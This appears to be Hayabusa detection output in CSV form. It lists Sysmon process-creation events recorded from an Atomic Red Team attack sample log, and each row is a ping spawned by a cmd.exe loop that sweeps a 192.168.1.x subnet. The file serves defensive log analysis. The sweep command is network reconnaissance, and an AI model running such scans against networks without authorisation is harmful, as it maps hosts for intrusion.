+2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.137  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.138  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.139  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.140  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.141  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.142  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.143  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.144  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.145  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.146  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.147  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.148  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.149  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.150  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.151  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.152  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.153  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.154  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.155  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.156  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.157  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.158  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.159  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.160  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.161  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.162  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.163  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.164  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.165  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.166  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.167  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.168  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.169  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.170  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.171  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.172  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.173  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.174  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.175  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.176  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.177  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.178  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.179  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.180  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.181  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.182  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.183  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.184  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.185  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.186  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.187  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.188  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.189  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.190  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
